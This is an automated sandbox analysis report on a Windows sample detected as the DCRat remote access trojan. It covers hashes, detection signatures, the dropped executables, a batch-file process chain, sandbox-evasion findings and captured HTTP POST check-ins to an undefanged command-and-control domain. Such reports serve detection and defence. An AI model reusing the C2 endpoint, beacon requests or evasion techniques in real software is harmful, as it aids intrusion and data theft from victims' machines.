Windows Analysis Report
1hibLFnCm1.exe

Overview

General Information

Sample name: 1hibLFnCm1.exe (renamed because the original name is a hash value)
Original sample name: 2196EDD4AD9D7E8CA345339A66E2FED5.exe
Analysis ID: 1466966
MD5: 2196edd4ad9d7e8ca345339a66e2fed5
SHA1: d604a25d04700d19896c1dfe12586568fae5c32f
SHA256: 90a9d213bced2844dbf8a635244a85f29fa5af2c439ca7782709b1ebe304734a
Tags: DCRat, exe

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 1hibLFnCm1.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\1hibLFnCm1.exe" MD5: 2196EDD4AD9D7E8CA345339A66E2FED5)
    • ms_tool.exe (PID: 6672 cmdline: "C:\Users\user\AppData\Roaming\ms_tool.exe" MD5: F3EDFF85DE5FD002692D54A04BCB1C09)
      • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ms_updater.exe (PID: 6768 cmdline: "C:\Users\user\AppData\Roaming\ms_updater.exe" MD5: CEAC3DE237F6B1DC4B279D8E5F5B3689)
      • cmd.exe (PID: 7096 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 6716 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • w32tm.exe (PID: 6600 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • cleanup

No configs have been found

Source | Rule | Description | Author
C:\Users\user\AppData\Roaming\ms_updater.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

Source | Rule | Description | Author
00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000003.00000000.1699967680.0000000000D92000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000003.00000002.1759262008.000000000314B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
Process Memory Space: 1hibLFnCm1.exe PID: 6532 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

Source | Rule | Description | Author
3.0.ms_updater.exe.d90000.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
0.2.1hibLFnCm1.exe.f50000.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
No Sigma rule has matched

Snort IDS alert:
Timestamp: 07/03/24-15:52:06.253098
SID: 2048095
Source Port: 49730
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: http://118621cm.n9shteam2.top/ | Avira URL Cloud: Label: malware
Source: http://118621cm.n9shteam2.top/protecttrackDatalifePrivateCentral.php | Avira URL Cloud: Label: malware
Source: http://118621cm.n9shteam2.top | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\gOvRVAND.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | ReversingLabs: Detection: 87%
Source: 1hibLFnCm1.exe | ReversingLabs: Detection: 70%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Joe Sandbox ML: detected
Source: 1hibLFnCm1.exe | Joe Sandbox ML: detected
Source: 3.0.ms_updater.exe.d90000.0.unpack | String decryptor: {"0":[],"75400db8-4680-4af7-97bd-c8a76b65b9c4":{"_0":"AjqVFPjRdUMLGTTtnlMEjUReAbQurGJk","_1":"Application Error","_2":"The application was unable to start correctly (0xc000007b). Click OK to close the application.","_3":"Error","_4":"OK"}}
Source: 3.0.ms_updater.exe.d90000.0.unpack | String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-Lio0c2TgfpaLmO8sHEt4","0","","","5","2","WyIwIiwiIiwiNSJd","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"]
Source: 1hibLFnCm1.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 1hibLFnCm1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mountvol.pdb | source: 1hibLFnCm1.exe, 1hibLFnCm1.exe, 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp, ms_tool.exe, 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe, 00000001.00000000.1699378223.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe.0.dr
Source: Binary string: mountvol.pdbGCTL | source: 1hibLFnCm1.exe, 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp, ms_tool.exe, 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe, 00000001.00000000.1699378223.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe.0.dr
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | File opened: C:\Users\user\AppData\Local

Networking

Source: Traffic | Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49730 -> 104.21.90.190:80
Source: Joe Sandbox View | IP Address: 104.21.90.190
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected:
    POST /protecttrackDatalifePrivateCentral.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 118621cm.n9shteam2.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /protecttrackDatalifePrivateCentral.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 118621cm.n9shteam2.top
    Content-Length: 384
    Expect: 100-continue
Source: global traffic | HTTP traffic detected:
    POST /protecttrackDatalifePrivateCentral.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 118621cm.n9shteam2.top
    Content-Length: 1536
    Expect: 100-continue
Source: global traffic | HTTP traffic detected:
    POST /protecttrackDatalifePrivateCentral.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 118621cm.n9shteam2.top
    Content-Length: 1056
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /protecttrackDatalifePrivateCentral.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 118621cm.n9shteam2.top
    Content-Length: 184204
    Expect: 100-continue
Source: global traffic | HTTP traffic detected:
    POST /protecttrackDatalifePrivateCentral.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 118621cm.n9shteam2.top
    Content-Length: 1056
    Expect: 100-continue
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: 118621cm.n9shteam2.top
Source: unknown | HTTP traffic detected:
    POST /protecttrackDatalifePrivateCentral.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
    Host: 118621cm.n9shteam2.top
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://118621cm.n9shteX
Source: ms_updater.exe, 00000003.00000002.1759262008.00000000030D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://118621cm.n9shteam2.top
Source: ms_updater.exe, 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://118621cm.n9shteam2.top/
Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, ms_updater.exe, 00000003.00000002.1759262008.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ms_updater.exe, 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, ms_updater.exe, 00000003.00000002.1759262008.00000000030D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://118621cm.n9shteam2.top/protecttrackDatalifePrivateCentral.php
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ms_tool.exe | Code function: 1_2_00007FF68C5E1494 LocalAlloc,NtQuerySystemInformation,LocalFree,LocalAlloc,LocalFree
Source: C:\Users\user\AppData\Roaming\ms_tool.exe | Code function: 1_2_00007FF68C5E1348 NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\ms_tool.exe | Code function: 1_2_00007FF68C5E13B4 CreateFileW,DeviceIoControl,CloseHandle
Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\gOvRVAND.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
Source: C:\Users\user\Desktop\1hibLFnCm1.exe | Code function: String function: 00F5BBC0 appears 55 times
Source: gOvRVAND.log.3.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: mHYqxgSr.log.3.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 1hibLFnCm1.exe | Binary or memory string: OriginalFilename vs 1hibLFnCm1.exe
Source: 1hibLFnCm1.exe, 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 1hibLFnCm1.exe
Source: 1hibLFnCm1.exe, 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMOUNTVOL.EXEj% vs 1hibLFnCm1.exe
Source: 1hibLFnCm1.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 1hibLFnCm1.exe | Static PE information: Section: .cSs ZLIB complexity 0.9997302899534523
Source: gOvRVAND.log.3.dr, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: mHYqxgSr.log.3.dr, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.evad.winEXE@13/8@1/1
Source: C:\Users\user\Desktop\1hibLFnCm1.exe | File created: C:\Users\user\AppData\Roaming\ms_tool.exe
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-Lio0c2TgfpaLmO8sHEt4
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | File created: C:\Users\user\AppData\Local\Temp\LLzNk9wqw6
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat"
Source: 1hibLFnCm1.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\1hibLFnCm1.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\1hibLFnCm1.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 1hibLFnCm1.exe | ReversingLabs: Detection: 70%
Source: unknown | Process created: C:\Users\user\Desktop\1hibLFnCm1.exe "C:\Users\user\Desktop\1hibLFnCm1.exe"
Source: C:\Users\user\Desktop\1hibLFnCm1.exe | Process created: C:\Users\user\AppData\Roaming\ms_tool.exe "C:\Users\user\AppData\Roaming\ms_tool.exe"
Source: C:\Users\user\AppData\Roaming\ms_tool.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1hibLFnCm1.exe | Process created: C:\Users\user\AppData\Roaming\ms_updater.exe "C:\Users\user\AppData\Roaming\ms_updater.exe"
Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: ktmw32.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: mmdevapi.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: devobj.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: ksuser.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: avrt.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: audioses.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: powrprof.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: umpdc.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: msacm32.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: midimap.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: dlnashext.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: wpdshext.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
                  Source: C:\Windows\System32\w32tm.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\w32tm.exe | Section loaded: logoncli.dll
                  Source: C:\Windows\System32\w32tm.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\w32tm.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\w32tm.exe | Section loaded: ntdsapi.dll
                  Source: C:\Windows\System32\w32tm.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\w32tm.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\w32tm.exe | Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\w32tm.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\w32tm.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: 1hibLFnCm1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: 1hibLFnCm1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mountvol.pdb source: 1hibLFnCm1.exe, 1hibLFnCm1.exe, 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp, ms_tool.exe, 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe, 00000001.00000000.1699378223.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe.0.dr
                  Source: Binary string: mountvol.pdbGCTL source: 1hibLFnCm1.exe, 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp, ms_tool.exe, 00000001.00000002.1701020136.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe, 00000001.00000000.1699378223.00007FF68C5E4000.00000002.00000001.01000000.00000005.sdmp, ms_tool.exe.0.dr
                  Source: 1hibLFnCm1.exe | Static PE information: section name: .cSs
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exe | Code function: 0_2_00F5B495 push ecx; ret 0_2_00F5B4A8
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Code function: 3_2_00007FFD9BAAFB02 pushad ; ret 3_2_00007FFD9BAAFB03
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Code function: 3_2_00007FFD9BAA8163 push ebx; ret 3_2_00007FFD9BAA816A
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exe | File created: C:\Users\user\AppData\Roaming\ms_updater.exe
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | File created: C:\Users\user\Desktop\mHYqxgSr.log
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | File created: C:\Users\user\Desktop\gOvRVAND.log
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exe | File created: C:\Users\user\AppData\Roaming\ms_tool.exe
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Memory allocated: 1560000 memory reserve | memory write watch
